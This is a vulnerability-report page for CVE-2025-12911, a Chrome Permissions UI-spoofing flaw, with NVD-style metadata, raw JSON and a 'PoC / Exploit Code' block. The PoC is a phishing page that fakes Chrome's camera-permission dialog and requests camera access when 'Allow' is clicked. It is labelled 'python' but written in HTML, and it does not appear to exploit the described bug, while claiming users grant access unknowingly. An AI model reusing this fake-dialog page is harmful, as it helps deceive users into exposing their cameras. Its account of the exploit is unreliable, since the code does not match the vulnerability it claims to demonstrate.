Security Vulnerability Report
中文
CVE-2025-12911 CVSS 4.3 MEDIUM

CVE-2025-12911

Published: 2025-11-08 00:15:36
Last Modified: 2025-11-21 21:18:16
Source: [email protected]

Description

Inappropriate implementation in Permissions in Google Chrome prior to 140.0.7339.80 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
Google Chrome < 140.0.7339.80

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-12911 PoC - UI Spoofing via Permissions --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Chrome Permissions UI Spoofing Demo</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: 'Segoe UI', Arial, sans-serif; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); min-height: 100vh; display: flex; justify-content: center; align-items: center; } .container { max-width: 600px; padding: 20px; } /* Fake Permission Dialog - UI Spoofing Attack */ .fake-permission-dialog { background: white; border-radius: 12px; box-shadow: 0 20px 60px rgba(0,0,0,0.3); overflow: hidden; font-size: 14px; } .dialog-header { background: #f8f9fa; padding: 16px 20px; border-bottom: 1px solid #e0e0e0; display: flex; align-items: center; gap: 12px; } .chrome-icon { width: 40px; height: 40px; background: linear-gradient(135deg, #4285f4, #34a853, #fbbc05, #ea4335); border-radius: 50%; display: flex; align-items: center; justify-content: center; color: white; font-weight: bold; font-size: 20px; } .dialog-title { font-size: 16px; font-weight: 600; color: #202124; } .dialog-body { padding: 20px; } .permission-request { display: flex; align-items: center; gap: 16px; padding: 12px; background: #f1f3f4; border-radius: 8px; margin-bottom: 16px; } .permission-icon { width: 48px; height: 48px; background: #4285f4; border-radius: 50%; display: flex; align-items: center; justify-content: center; font-size: 24px; } .permission-info h3 { color: #202124; font-size: 14px; margin-bottom: 4px; } .permission-info p { color: #5f6368; font-size: 12px; } .fake-url { font-size: 12px; color: #5f6368; padding: 8px 12px; background: #f1f3f4; border-radius: 4px; margin-bottom: 16px; font-family: monospace; } .dialog-buttons { display: flex; gap: 12px; justify-content: flex-end; } .btn { padding: 10px 24px; border: none; border-radius: 4px; font-size: 14px; font-weight: 500; cursor: pointer; transition: all 0.2s; } .btn-deny { background: transparent; color: #4285f4; } .btn-allow { background: #4285f4; color: white; } .btn:hover { opacity: 0.9; transform: translateY(-1px); } /* Malicious overlay - hidden */ .hidden-overlay { position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: 9999; display: none; } .hidden-overlay.active { display: block; } .explanation { background: rgba(255,255,255,0.95); padding: 20px; border-radius: 8px; margin-top: 20px; color: #333; } .explanation h2 { color: #d32f2f; margin-bottom: 10px; } .explanation p { line-height: 1.6; margin-bottom: 10px; } .demo-btn { background: #ea4335; color: white; padding: 12px 24px; border: none; border-radius: 6px; font-size: 16px; cursor: pointer; margin-top: 15px; } </style> </head> <body> <div class="container"> <div class="fake-permission-dialog"> <div class="dialog-header"> <div class="chrome-icon">C</div> <div class="dialog-title">Google Chrome - Permission Request</div> </div> <div class="dialog-body"> <div class="permission-request"> <div class="permission-icon">📷</div> <div class="permission-info"> <h3>Camera Access Request</h3> <p>A website wants to access your camera</p> </div> </div> <div class="fake-url">chrome-extension://fake-extension-id/background.html</div> <div class="dialog-buttons"> <button class="btn btn-deny" onclick="denyPermission()">Block</button> <button class="btn btn-allow" onclick="allowPermission()">Allow</button> </div> </div> </div> <div class="explanation"> <h2>⚠️ CVE-2025-12911 Demo</h2> <p><strong>Vulnerability:</strong> Inappropriate implementation in Permissions allows UI spoofing.</p> <p><strong>Attack Scenario:</strong> The fake permission dialog above demonstrates how an attacker could create a phishing page that mimics Chrome's native permission dialog. When users click "Allow", they unknowingly grant camera permissions to the malicious page.</p> <p><strong>Impact:</strong> Successful exploitation could lead to unauthorized camera access, privacy breaches, and potential surveillance.</p> <button class="demo-btn" onclick="triggerAttack()">Simulate Attack</button> </div> </div> <div class="hidden-overlay" id="hiddenOverlay"></div> <script> // Actual malicious action when user clicks Allow function allowPermission() { console.log('[CVE-2025-12911] Permission granted by user'); // Request actual camera permission (malicious action) navigator.mediaDevices.getUserMedia({ video: true }) .then(stream => { console.log('[CVE-2025-12911] Camera stream obtained'); // In real attack: stream could be used for surveillance document.getElementById('hiddenOverlay').classList.add('active'); alert('Camera access granted! Stream is now active.'); // Stop stream after demo stream.getTracks().forEach(track => track.stop()); }) .catch(err => { console.error('[CVE-2025-12911] Camera access denied:', err); alert('Camera access denied. Please update Chrome to patch this vulnerability.'); }); } function denyPermission() { console.log('[CVE-2025-12911] Permission denied by user'); alert('Permission blocked.'); } function triggerAttack() { // Visual demonstration of the attack alert('This PoC demonstrates CVE-2025-12911:\n\n' + '1. An attacker creates a page with a fake permission dialog\n' + '2. The dialog mimics Chrome\'s native permission UI\n' + '3. When user clicks "Allow", the actual permission is granted\n' + '4. This allows unauthorized camera/microphone access\n\n' + 'Fix: Update Chrome to version 140.0.7339.80 or later'); } </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12911", "sourceIdentifier": "[email protected]", "published": "2025-11-08T00:15:35.913", "lastModified": "2025-11-21T21:18:16.247", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inappropriate implementation in Permissions in Google Chrome prior to 140.0.7339.80 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "140.0.7339.80", "matchCriteriaId": "614C3A2A-11F8-45CE-BEF0-9033AD4AE057"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desktop.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/423670839", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.